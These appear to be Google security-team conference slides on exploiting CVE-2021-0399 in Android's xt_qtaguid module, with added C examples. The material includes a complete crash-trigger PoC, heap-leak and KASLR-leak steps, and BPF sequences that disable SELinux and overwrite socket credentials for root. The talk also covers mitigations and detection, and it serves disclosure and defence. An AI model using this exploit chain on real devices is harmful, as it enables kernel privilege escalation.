These slides cover the exploitation of a use-after-free (UAF), CVE-2021-0399, in xt_qtaguid, the Android kernel's netfilter traffic-accounting module: kernel internals of the module, the vulnerability analysis, the exploitation process (including a ret2bpf technique that reuses the BPF interpreter as an arbitrary kernel read/write primitive), mitigations, and how Google detects exploit code at scale. The authors are security engineers on Google's Android Security Team.


The Art of Exploiting UAF by Ret2bpf in Android Kernel

Xingyu Jin | Richard Neal


Android Security Team, Google

TRACK 1
Who Are We?
● Xingyu Jin
○ Security Engineer at Google
○ Occasionally plays CTFs and hunts kernel bugs.
● Richard Neal
○ Android Malware Research team at Google
○ Security Engineer (and manager)

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 2
Agenda
● Kernel Internals of Android netfilter module xt_qtaguid
○ Known vulnerabilities in the past
● CVE-2021-0399 Vulnerability Analysis
● Exploit CVE-2021-0399
○ Demo on exploiting Android device
● Mitigations
● How does Google detect exploit code at scale

The Art of Exploiting UAF by Ret2bpf in Android Kernel | Xingyu Jin & Richard Neal 3
Android module xt_qtaguid

xt_qtaguid Introduction
● Data usage monitoring and tracking functionality since Android 3.0
○ Tracks network traffic per socket and attributes it to the owning app (uid)
● Module /dev/xt_qtaguid exists on Android devices since 2011
○ Replaced by eBPF since Android Q
● Userspace sends commands to kernel
○ E.g. TrafficStats.tagSocket API

xt_qtaguid Open Device

● Allocates a struct uid_tag_data for every unique uid
● Allocates a struct proc_qtu_data for every unique pid that opens the device
● N:1 relationship: many proc_qtu_data (one per process) map to one uid_tag_data
xt_qtaguid Tag Socket (ctrl_cmd_tag)
● Read socket fd, tag and uid from userspace
○ sscanf(input, "%c %d %llu %u", &cmd, &sock_fd, &acct_tag, &uid_int);
● Creates a tag_ref and a sock_tag

xt_qtaguid
● Tag socket(ctrl_cmd_tag) VS Untag socket(ctrl_cmd_untag->qtaguid_untag)

Vulnerability Analysis & Exploitation

CVE-2016-3809
● Kernel Information Leak
● Read /proc/net/xt_qtaguid/ctrl and obtain the kernel address of the socket structure
○ sock=0xffffffc01855bb80, …
○ Strengthens exploits for CVE-2015-3636 and similar bugs :-/
● You may still find OEM devices shipped after 2017 with this bug :-/
CVE-2017-13273
● Race condition due to incorrect locking
○ UAF on tag_ref_tree
● From 2011 to 2020, only 2 vulnerabilities were reported in xt_qtaguid.c
○ 1 kernel heap information leak
○ 1 UAF by race

● What could possibly go wrong in 2021?
CVE-2021-0399
● Discovered by an external researcher
○ In xt_qtaguid.c, there is a potential UAF.
○ No PoC or exploitation details were provided; the researcher believed it to be
impossible to exploit on modern devices that enable CONFIG_ARM64_UAO
● Minimal crashing PoC by Richard:

    tag_socket(sock_fd, /*tag=*/0x12345678, getuid());
    fork_result = fork();
    if (fork_result == 0) {
        untag_socket(sock_fd);   /* child: the kernel has no proc_qtu_data for this pid */
    } else {
        (void)waitpid(fork_result, NULL, 0);
    }
    exit(0);
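A complete version of the minimal PoC above, added here as an example and not code from the slides. It assumes the qtaguid control protocol as used by libcutils: open /dev/xt_qtaguid so the kernel registers a proc_qtu_data for the calling pid, then write "t <sockfd> <acct_tag> <uid>" and "u <sockfd>" to /proc/net/xt_qtaguid/ctrl (the "%c %d %llu %u" parse shown earlier), where the 32-bit app tag occupies the upper half of the 64-bit accounting tag; the low-32-bits-zero rule (valid_atag) and the paths are assumptions about the target kernel. It only triggers anything on an unpatched kernel that still ships the module; elsewhere the open() fails and the program exits.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Paths used by libcutils' qtaguid client (assumption: unchanged on the target). */
#define QTAGUID_DEV  "/dev/xt_qtaguid"            /* open() registers a proc_qtu_data for this pid */
#define QTAGUID_CTRL "/proc/net/xt_qtaguid/ctrl"  /* commands are written here */

/* Kernel-side rule for accounting tags (mirrors valid_atag(), assumed): the low
 * 32 bits must be zero because the kernel ORs the uid into them. */
int valid_atag(uint64_t tag) {
    return (tag & 0xFFFFFFFFULL) == 0;
}

/* "t <sockfd> <acct_tag> <uid>": the 32-bit app tag is shifted into the upper half. */
int format_tag_cmd(char *buf, size_t len, int sock_fd, uint32_t app_tag, uid_t uid) {
    uint64_t acct_tag = (uint64_t)app_tag << 32;
    if (!valid_atag(acct_tag))
        return -1;
    int n = snprintf(buf, len, "t %d %llu %u", sock_fd,
                     (unsigned long long)acct_tag, (unsigned)uid);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

/* "u <sockfd>": untag; the kernel looks up the caller's pid to find its proc_qtu_data. */
int format_untag_cmd(char *buf, size_t len, int sock_fd) {
    int n = snprintf(buf, len, "u %d", sock_fd);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

static int send_ctrl(const char *cmd) {
    int fd = open(QTAGUID_CTRL, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, cmd, strlen(cmd));
    close(fd);
    return w == (ssize_t)strlen(cmd) ? 0 : -1;
}

int main(void) {
    char cmd[64];

    /* 1. Register with the module so the parent pid owns a proc_qtu_data. */
    int dev = open(QTAGUID_DEV, O_RDONLY);
    if (dev < 0) {
        perror("open " QTAGUID_DEV " (no qtaguid on this kernel?)");
        return 1;
    }
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) { perror("socket"); return 1; }

    /* 2. Tag the socket: allocates a sock_tag linked into the parent's list. */
    if (format_tag_cmd(cmd, sizeof cmd, sock, 0x12345678u, getuid()) < 0 ||
        send_ctrl(cmd) < 0) {
        perror("tag");
        return 1;
    }

    /* 3. Untag from a child. fork() copies the fds but never calls open(), so
     *    qtaguid_untag finds no proc_qtu_data for the child's pid, warns, and
     *    frees the sock_tag without unlinking it from the parent's list. */
    pid_t child = fork();
    if (child < 0) { perror("fork"); return 1; }
    if (child == 0) {
        if (format_untag_cmd(cmd, sizeof cmd, sock) < 0 || send_ctrl(cmd) < 0)
            _exit(1);
        _exit(0);
    }
    (void)waitpid(child, NULL, 0);

    /* 4. Parent exit: qtudev_release walks the list that still holds the
     *    freed entry, which is the crash the slides describe. */
    return 0;
}
```

The command formatting is kept in separate functions so the string layer can be checked without a vulnerable kernel; the fork/untag sequence is exactly the one in the slide's snippet.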
● Untag socket (ctrl_cmd_untag -> qtaguid_untag)...
○ Finds the corresponding proc_qtu_data based on the caller's pid.
○ Removes the sock_tag from proc_qtu_data.sock_tag_list.
○ Frees the sock_tag.
● An application may call fork and untag the socket in the child process
○ The child never opened the device, so the pid lookup fails: pqd_entry == NULL
● The kernel logs a warning about the unexpected situation but does nothing about it
● sock_tag_entry->list is not removed from the parent's list, yet sock_tag_entry is freed
○ UAF: a dangling entry in proc_qtu_data.sock_tag_list
Exploit CVE-2021-0399
Own your Android!
● Mitigations in place: SELinux, seccomp, KASLR, PAN, PXN, ADDR_LIMIT_CHECK, CONFIG_ARM64_UAO,
CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED
● Target: recent devices manufactured in 2019-2020, security patch level January 2021,
Android Pie, kernel 4.14 (e.g. Xiaomi Mi 9, OnePlus 7 Pro)
Step 0 - eventfd leaks kernel heap address
● Most arm64 devices use kmalloc-128 as the smallest slab object (ARCH_DMA_MINALIGN is 128, so KMALLOC_MIN_SIZE is 128)
○ E.g. the object returned by kmalloc(/*obj_size=*/10) is 128 bytes
● The child process calls ctrl_cmd_untag
○ sock_tag is freed but stays linked in the parent's sock_tag_list
○ Spray eventfd: eventfd_ctx is also a kmalloc-128 object, so it can land on the freed sock_tag
● Untag another sock_tag (one whose list.prev is the freed entry): list_del unlinks it
○ sock_tag->prev->next = sock_tag->next
○ prev is now the sprayed eventfd_ctx, and eventfd_ctx->count sits at the same offset as sock_tag->list.next, so
eventfd_ctx->count = &list_head
● Read /proc/self/fdinfo/$fd for each sprayed eventfd
○ The eventfd-count line of the overlapping one now holds the address of the head node: a kernel heap info leak
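A userspace replay of the three list operations in Step 0, added here as an example (neither the slides' nor the kernel's code). It assumes the 64-bit layouts of struct sock_tag (xt_qtaguid_internal.h) and struct eventfd_ctx (fs/eventfd.c) on a 4.14 arm64 kernel without lock debugging, under which sock_tag.list.next and eventfd_ctx.count share byte offset 32; the _Static_assert lines document that assumption, and the insertion order (ctrl_cmd_tag inserting at the head of the list) is likewise assumed. It shows why the parent's untag of C writes the address of the list head straight into the eventfd counter.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

/* struct sock_tag from xt_qtaguid_internal.h on a 64-bit kernel (assumed layout). */
struct sock_tag {
    unsigned char sock_node[24];  /* struct rb_node: __rb_parent_color, rb_right, rb_left */
    void *sk;                     /* struct sock * */
    struct list_head list;        /* entry in proc_qtu_data.sock_tag_list, offset 32 */
    int pid;
    uint64_t tag;
};

/* struct eventfd_ctx from fs/eventfd.c, arm64 4.14 without lock debugging (assumed layout). */
struct eventfd_ctx {
    uint32_t kref;                /* struct kref */
    uint32_t pad;                 /* wait_queue_head_t is 8-byte aligned */
    unsigned char wqh[24];        /* spinlock_t + struct list_head */
    uint64_t count;               /* offset 32: shown as "eventfd-count" in fdinfo */
    uint32_t flags;
};

_Static_assert(sizeof(struct sock_tag) == 64, "slides: sizeof(struct sock_tag) == 64");
_Static_assert(offsetof(struct sock_tag, list) == offsetof(struct eventfd_ctx, count),
               "list.next must alias count for the leak to work");

/* One kmalloc-128 slot: first used as a sock_tag, later reused as an eventfd_ctx. */
union slab_obj {
    struct sock_tag st;
    struct eventfd_ctx ctx;
    unsigned char raw[128];
};

static void list_init(struct list_head *h) { h->next = h->prev = h; }
static void list_add(struct list_head *n, struct list_head *head)   /* insert right after head */
{
    n->next = head->next;
    n->prev = head;
    head->next->prev = n;
    head->next = n;
}
/* list_del() as built without CONFIG_DEBUG_LIST: trusts prev and next blindly. */
static void list_del(struct list_head *e)
{
    e->next->prev = e->prev;
    e->prev->next = e->next;
}

/* Replays Step 0 and returns the value the sprayed eventfd would report;
 * *head_out receives the real address of the list head for comparison. */
uint64_t replay_step0(uintptr_t *head_out)
{
    static struct list_head sock_tag_list;       /* proc_qtu_data.sock_tag_list */
    union slab_obj *b = calloc(1, sizeof *b);
    union slab_obj *c = calloc(1, sizeof *c);
    uint64_t leaked;

    /* Parent tags C, then B: inserting at the head gives head -> B -> C -> head. */
    list_init(&sock_tag_list);
    list_add(&c->st.list, &sock_tag_list);
    list_add(&b->st.list, &sock_tag_list);

    /* Child untags B: kfree(B) with B still linked (the bug). Model the slot
     * being handed to eventfd2() by wiping it and initialising count = 0. */
    memset(b->raw, 0, sizeof b->raw);
    b->ctx.count = 0;

    /* Parent untags C: __list_del(C->prev, C->next) does prev->next = next,
     * and prev is B, so the write lands on B->ctx.count. */
    list_del(&c->st.list);

    memcpy(&leaked, b->raw + offsetof(struct eventfd_ctx, count), sizeof leaked);
    *head_out = (uintptr_t)&sock_tag_list;
    free(b);
    free(c);
    return leaked;
}

int main(void)
{
    uintptr_t head;
    uint64_t leaked = replay_step0(&head);
    printf("eventfd-count: %llx, list head at %llx\n",
           (unsigned long long)leaked, (unsigned long long)head);
    return leaked == head ? 0 : 1;
}
```

Reading the counter back through the raw bytes rather than the union member keeps the type confusion explicit: the kernel never "converts" anything, it simply writes a list pointer through memory that a different subsystem now interprets as a 64-bit counter.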
Step 1 - Double Free on kmalloc-128
● Naive try
○ Close the device (qtudev_release): will it free the sock_tag again?
○ qtudev_release moves every sock_tag still linked in the list to st_to_free_tree and frees them later
● Naive try
○ Kernel crash
● The security check in qtudev_release is rigorous
● qtudev_release checks whether the tag is still valid
○ tag_ref doesn't exist? Crash
○ The earlier untag already dropped tr->num_sock_tags to 0
○ BUG_ON(tr->num_sock_tags <= 0);
● Head node leaked
● Free tag B from the child (UAF)
● Untag tag C from the parent
○ Leaks the address of tag D
● Spray over B and D with carefully crafted data to pass the kernel's checks
● Tag impersonation: "B"->"E", "D"->"F"
● Freeing the sprayed buffer: __rb_parent_color must point to accessible memory for
rb_erase to succeed
One more thing: CVE-2021-0399 + CVE-2016-3809
● When qtudev_release is called, sock_put(st_entry->sk) is invoked on the stale entry
● Kernel socket UAF
● Time travel
○ CVE-2015-3636 (pingpong)
○ CVE-2017-11176 (mq_notify double sock_put)
○ ...
Step 2 - KASLR leak
● sizeof(struct sock_tag) == 64, so one kmalloc-128 object holds 2 sock_tag
● Kernel calls
- kfree(sock_tag)
- kfree(sock_tag + 0x40)
● Consider spraying slab at the beginning of the exploit

● Open /proc/cpuinfo
○ Kernel will allocate seq_file structures
○ seq_file <-> eventfd_ctx
■ slab might look like this

● Leak
○ eventfd_ctx->count now aliases the const struct seq_operations *op of the
overlapping seq_file, a pointer into the kernel image
○ The spinlock still works
● Kernel ASLR leak on a Xiaomi Mi 9 (released in 2019)
Step 3 - Rooting (possible primitives)
● If CONFIG_SLAB_FREELIST_HARDENED is not enabled
○ Double free => KSMA (Kernel Space Mirroring Attack)
● Primitive candidate: sock_put(sk) where you control sk
○ dec(sk->__sk_common.skc_refcnt) if sk->sk_wmem_alloc > 0
○ Possible ways to disable SELinux and kptr_restrict
■ Depends on the kernel image
■ Disable kptr_restrict -> CVE-2016-3809 socket struct info
leak -> sock UAF!
Controlling seq_operations
● Primitive: overwriting seq_operations
○ write(fd, &delta, sizeof(delta)) on the eventfd adds delta to eventfd_ctx->count, i.e. to the
overlapped seq_file's op pointer
○ Move cpuinfo_op to consoles_op by the known delta, so the file descriptor of
the overlapped seq_file can be identified by its changed output
● Then overwrite seq_operations with a leaked heap address
Overwriting addr_limit?
● Because two seq_files overlap, you may control the first 64 bytes of the
seq_file overlapped with the eventfd through another heap spray
● Old trick: ROP on kernel_getsockopt to overwrite addr_limit
○ Unfortunately it doesn't work on 4.14 arm64
■ addr_limit_user_check guards against a tampered addr_limit
■ CONFIG_ARM64_UAO (enabled by default in 4.14) guards against
a tampered addr_limit
The Ultimate ROP
● As mentioned in the Project Zero blog post "An iOS hacker tries Android", Jann
Horn recommends using ___bpf_prog_run as the ROP target
● Invoke arbitrary BPF instructions without verification
○ Arbitrary kernel R&W primitive
○ Turn off kptr_restrict & SELinux
● Example for turning off SELinux (store 0 to selinux_enforcing)
○ BPF_LD_IMM64(BPF_REG_2, selinux_enforcing_addr)
○ BPF_MOV64_IMM(BPF_REG_0, 0)
○ BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0)
○ BPF_EXIT_INSN()
Root shell
● Once kptr_restrict is turned off, we can get a leaked sock address
● Hammer sock->sk_peer_cred with BPF instructions placed in a leaked kmalloc-128
object (568 is the offset of sk_peer_cred in this kernel's struct sock; the store
offsets follow struct cred):
○ BPF_LD_IMM64(BPF_REG_2, sk_addr)
○ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 568)    /* r3 = sk->sk_peer_cred */
○ BPF_MOV64_IMM(BPF_REG_0, 0x0)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 4)      /* uid, gid */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 12)     /* suid, sgid */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 20)     /* euid, egid */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 28)     /* fsuid, fsgid */
○ BPF_MOV64_IMM(BPF_REG_0, -1)
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 40)     /* cap_inheritable */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 48)     /* cap_permitted */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 56)     /* cap_effective */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 64)     /* cap_bset */
○ BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_0, 72)     /* cap_ambient */
○ BPF_EXIT_INSN()
● Are there other ways to exploit it? Yes
● PWN Mi9 device in less than 10 seconds!

Detecting & Mitigating Exploitation

Mitigations

CONFIG_SLAB_FREELIST_HARDENED

● The freelist pointer is obfuscated -> the first word of a freed sock_tag, __rb_parent_color, no longer holds a usable pointer
● Bypassed with signalfd: signalfd(-1, &sigmask, 0x0)
■ sigmask = ~head_address
■ signalfd_ctx->sigmask = head_addr | 0x40100 (the kernel removes SIGKILL and
SIGSTOP from the mask before storing its complement, so bits 8 and 18 are forced on)
● MCAST_JOIN_GROUP may also work for similar scenarios
Kernel Electric Fence

● KFENCE is a low-overhead, sampling-based memory safety error detector for heap
use-after-free, invalid-free, and out-of-bounds access errors.
● KFENCE hooks into the SLAB and SLUB allocators.
● Compared to KASAN, KFENCE trades precision for performance: it is cheap enough for
production, but only catches errors in the allocations it samples
○ Guarded allocations are set up based on a sample interval
CONFIG_ARM64_UAO

● Classic kernel memory access technique
○ Overwrite addr_limit
○ Use pipes to read/write kernel memory
● ARMv8.2-A User Access Override
○ Changes the behaviour of LDTR and STTR above EL0
○ Allows Privileged Access Never (PAN) to be enabled all the time
● Bypassed with ret2bpf
Seq_file Isolation / KSMA defense

● seq_file has its dedicated cache


● Researcher Jun Yao also had proposals about making Android
exploitation more difficult by defeating KSMA
○ https://lore.kernel.org/patchwork/cover/912210/

Kernel Control Flow Integrity

● Blocks attackers from redirecting the flow of execution


● Available from 2018 in Android kernel 4.9 and above
○ Uses LTO and CFI from clang
● Relevant change in seq_read (decompiled):

    show = private_data->op->show;
    if ( __ROR8__((char *)show - (char *)_typeid__ZTSFiP8seq_filePvE_global_addr, 2) >= 0x184uLL )
        _cfi_slowpath(0x5233D5BC7887AE44uLL, private_data->op->show, 0LL);
    v31 = show(private_data, (void *)v34);

● Detects the modified show pointer (it is outside the jump table for that function type) -> panic()
CONFIG_BPF_JIT_ALWAYS_ON

● Required for Android, except on ARM32

● BPF must use the JIT
○ No interpreter
○ ___bpf_prog_run is not compiled in, so it cannot be called
CONFIG_DEBUG_LIST
● Now required for Android (recommended by Maddie Stone from Project Zero)
● __list_add_valid and __list_del_entry_valid check the link pointers before every insert and delete:

    bool __list_add_valid(struct list_head *new, struct list_head *prev,
                          struct list_head *next)
    {
        if (CHECK_DATA_CORRUPTION(next->prev != prev,
                "list_add corruption. next->prev should be prev (%px), but was %px. (next=%px).\n",
                prev, next->prev, next) ||
            CHECK_DATA_CORRUPTION(prev->next != next,
                "list_add corruption. prev->next should be next (%px), but was %px. (prev=%px).\n",
                next, prev->next, prev) ||
            CHECK_DATA_CORRUPTION(new == prev || new == next,
                "list_add double add: new=%px, prev=%px, next=%px.\n",
                new, prev, next))
            return false;

        return true;
    }
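The check that matters for this exploit is the sibling of the one above, __list_del_entry_valid, which list_del runs before unlinking. Below is a userspace port, added as an example rather than the kernel's code verbatim: poison values follow include/linux/poison.h with arm64's 0xdead000000000000 delta, and CHECK_DATA_CORRUPTION is reduced to a warning plus early return, which is its behaviour when CONFIG_BUG_ON_DATA_CORRUPTION is off. Applied to the list state from Step 0 of the exploit: once the freed sock_tag's memory is reused and the word aliasing its list.next no longer points back at C, the prev->next != entry test fires and the unlink, and with it the info leak, never happens.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct list_head { struct list_head *next, *prev; };

/* include/linux/poison.h: 0x100/0x200 plus the arm64 POISON_POINTER_DELTA. */
#define LIST_POISON1 ((struct list_head *)(uintptr_t)0xdead000000000100ULL)
#define LIST_POISON2 ((struct list_head *)(uintptr_t)0xdead000000000200ULL)

/* lib/list_debug.c semantics without CONFIG_BUG_ON_DATA_CORRUPTION:
 * report the corruption and let the caller bail out instead of panicking. */
#define CHECK_DATA_CORRUPTION(cond, fmt, ...) \
    ((cond) ? (fprintf(stderr, fmt, __VA_ARGS__), true) : false)

/* Port of the kernel's check that runs before every list_del(). */
bool __list_del_entry_valid(struct list_head *entry)
{
    struct list_head *prev = entry->prev;
    struct list_head *next = entry->next;

    if (CHECK_DATA_CORRUPTION(next == LIST_POISON1,
            "list_del corruption, %p->next is LIST_POISON1 (%p)\n",
            (void *)entry, (void *)LIST_POISON1) ||
        CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
            "list_del corruption, %p->prev is LIST_POISON2 (%p)\n",
            (void *)entry, (void *)LIST_POISON2) ||
        CHECK_DATA_CORRUPTION(prev->next != entry,
            "list_del corruption. prev->next should be %p, but was %p\n",
            (void *)entry, (void *)prev->next) ||
        CHECK_DATA_CORRUPTION(next->prev != entry,
            "list_del corruption. next->prev should be %p, but was %p\n",
            (void *)entry, (void *)next->prev))
        return false;
    return true;
}

/* list_del() as built with CONFIG_DEBUG_LIST: validate, unlink, poison. */
bool list_del_checked(struct list_head *entry)
{
    if (!__list_del_entry_valid(entry))
        return false;
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
    entry->next = LIST_POISON1;
    entry->prev = LIST_POISON2;
    return true;
}

static void list_init(struct list_head *h) { h->next = h->prev = h; }
static void list_add(struct list_head *n, struct list_head *head)
{
    n->next = head->next;
    n->prev = head;
    head->next->prev = n;
    head->next = n;
}

/* Replays the Step 0 list state: head -> B -> C. With reuse_b set, B's slot
 * has been freed and re-allocated as an eventfd_ctx whose count (0) now sits
 * on top of B->list.next. Returns whether the parent's untag of C (a
 * list_del) is allowed to perform the unlink that leaked the head address. */
bool untag_c_after_reuse(bool reuse_b)
{
    struct list_head head, b, c;

    list_init(&head);
    list_add(&c, &head);
    list_add(&b, &head);
    if (reuse_b)
        b.next = NULL;      /* eventfd_ctx.count == 0 written over the freed sock_tag */
    return list_del_checked(&c);
}

int main(void)
{
    printf("intact list: unlink %s\n", untag_c_after_reuse(false) ? "allowed" : "blocked");
    printf("after UAF reuse: unlink %s\n", untag_c_after_reuse(true) ? "allowed" : "blocked");
    return 0;
}
```

With CONFIG_BUG_ON_DATA_CORRUPTION the same condition is a BUG() rather than a skipped operation; either way the attacker loses the controlled write that Step 0 depends on.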
Detect Exploits at Scale

On-Device Protection

● Application verifier
● Similarity analysis against known-bad APKs
● Detection rules
● Advanced Protection

Backend Infrastructure
● Google Play applications are constantly analysed
● Generation of data
○ Static analysis
■ APK contents
■ Unpacking
■ Deobfuscation
○ Dynamic analysis
● Interpreting data

Manual Analysis

● Sources
○ Internal collaboration - Android Security Assurance, Project
Zero, TAG, Trust & Safety
○ External reports
● Work
○ Reverse engineering + Research
● Outputs
○ Documentation, new detection techniques / systems

Behavioural Detection

● What the code does, not what it looks like


● Root exploits need to interact with the kernel

Behavioural Detection

● eBPF allows monitoring of calls and parameters


● Look for evidence of exploit behaviour, e.g. floods
● Interesting syscalls
○ fsetxattr+inotify
○ getsockopt / setsockopt MCAST_JOIN_GROUP

CVE-2018-9568

Summary

● Researchers
○ Keep looking for workarounds
● Users
○ Multiple levels of mitigation block all these techniques
○ Generic Kernel Image will get updates to users faster

Thank you!

● Thanks to Jann Horn for suggesting Android exploitation tips on real physical Android devices.
● Thanks to Ziwai Zhou for donating his Mi 9 device.
Thank You for Joining Us
Join our Discord channel to discuss more or ask questions
https://discord.gg/dXE8ZMvU9J
